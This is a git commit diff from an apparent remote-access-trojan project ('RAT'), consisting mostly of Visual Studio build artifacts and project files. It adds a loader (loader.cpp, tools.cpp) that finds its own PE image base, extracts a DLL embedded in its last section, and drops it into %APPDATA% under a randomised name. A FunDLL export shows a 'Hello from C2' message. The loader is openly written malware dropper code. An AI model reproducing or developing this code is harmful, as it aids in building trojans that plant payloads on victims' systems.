Changed a lot of things. Addded a loader for extracting payload onto system

This commit is contained in:
hellisabove
2023-07-03 15:32:13 +03:00
parent 0969e96a55
commit 9f4a57720b
69 changed files with 406 additions and 63 deletions
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
Binary file not shown.
BIN
View File
Binary file not shown.
+13
View File
@@ -0,0 +1,13 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
+7
View File
@@ -0,0 +1,7 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
+2
View File
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+15
View File
@@ -0,0 +1,15 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+31 -33
View File
@@ -21,17 +21,18 @@
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{c7e129b4-8a7e-4e5c-a259-573609675fed}</ProjectGuid>
<RootNamespace>RAT</RootNamespace>
<ProjectGuid>{0299d361-d3f7-419a-ab93-fb36642c97fa}</ProjectGuid>
<RootNamespace>Dll</RootNamespace>
<WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
<ProjectName>FunDLL</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
@@ -41,18 +42,17 @@
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@@ -72,18 +72,25 @@
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<FunctionLevelLinking>true</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
@@ -106,21 +113,13 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<OmitFramePointers>false</OmitFramePointers>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<MinimumRequiredVersion>5.01</MinimumRequiredVersion>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -128,16 +127,15 @@
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<MinimumRequiredVersion>5.02</MinimumRequiredVersion>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
+1 -2
View File
@@ -12,9 +12,8 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break;
}
return 1;
}
extern "C" __declspec(dllexport) int FunEntry() {
return MessageBoxA(0, "Hello World From C2", 0, 0);
return MessageBoxA(0, "Hello from C2", 0, 0);
}
@@ -0,0 +1,13 @@
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\debug\injector.exe
c:\users\hellisabove\source\repos\rat\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog
+11
View File
@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
Binary file not shown.
+2
View File
@@ -0,0 +1,2 @@
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj
@@ -0,0 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+3 -3
View File
@@ -35,9 +35,9 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
@@ -127,7 +127,7 @@
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="Source.cpp" />
<ClCompile Include="injector.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
+1 -1
View File
@@ -15,7 +15,7 @@
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Source.cpp">
<ClCompile Include="injector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
@@ -1,12 +0,0 @@
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.idb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\source.obj
c:\users\hellisabove\source\repos\rat\x64\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\x64\debug\injector.exe
c:\users\hellisabove\source\repos\rat\x64\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.write.1.tlog
-2
View File
@@ -1,2 +0,0 @@
Source.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\x64\Debug\Injector.exe
+11
View File
@@ -0,0 +1,11 @@
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj
c:\users\hellisabove\source\repos\rat\debug\loader.exe
c:\users\hellisabove\source\repos\rat\debug\loader.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog
+2
View File
@@ -0,0 +1,2 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+165
View File
@@ -0,0 +1,165 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{81f05638-72b8-41da-b80a-4f292961d9a1}</ProjectGuid>
<RootNamespace>Loader</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<OmitFramePointers>true</OmitFramePointers>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<OmitFramePointers>true</OmitFramePointers>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>
</EntryPointSymbol>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>TurnOffAllWarnings</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<OmitFramePointers>true</OmitFramePointers>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="loader.cpp" />
<ClCompile Include="tools.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="tools.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
+30
View File
@@ -0,0 +1,30 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="loader.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="tools.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="tools.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
+4
View File
@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
+23
View File
@@ -0,0 +1,23 @@
#include <Windows.h>
#include "tools.h"
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
// move payload onto %appdata% with some random generated name
DWORD bytes_written = NULL;
WCHAR appdata_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%APPDATA%"), appdata_path, MAX_PATH - 1) > 0) {
wsprintfW(appdata_path, TEXT("%s\\%lu.%cl%c"), appdata_path, GetTickCount(), 'd', 'l');
HANDLE new_file = CreateFileW(appdata_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
}
}
}
+36
View File
@@ -0,0 +1,36 @@
#include "tools.h"
#include <Windows.h>
PVOID Tools::GetImageBase() {
PWORD virtual_address = PWORD(&GetImageBase);
PDWORD image_base = NULL;
__asm {
mov eax, virtual_address
and eax, 0xFFFF0000
IterateImage:
cmp WORD PTR[eax], 0x5A4D
je EndIteration
sub eax, 0x00010000
jmp IterateImage
EndIteration:
mov[image_base], eax
}
return image_base;
}
PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) {
PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base);
if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew);
if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) {
PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers));
PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1);
if (dll_section != ERROR) {
*module_size = dll_section->Misc.VirtualSize;
return RtlOffsetToPointer(module_base, dll_section->VirtualAddress);
}
}
}
}
+9
View File
@@ -0,0 +1,9 @@
#pragma once
#include <Windows.h>
#define RtlOffsetToPointer(Module, Pointer) PBYTE(PBYTE(Module) + DWORD(Pointer))
namespace Tools {
PVOID GetImageBase();
PBYTE ExtractDllFile(PBYTE module_base, PDWORD module_size);
}
+19 -9
View File
@@ -5,7 +5,9 @@ VisualStudioVersion = 17.6.33815.320
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}"
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{81F05638-72B8-41DA-B80A-4F292961D9A1}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll", "Dll\Dll.vcxproj", "{0299D361-D3F7-419A-AB93-FB36642C97FA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
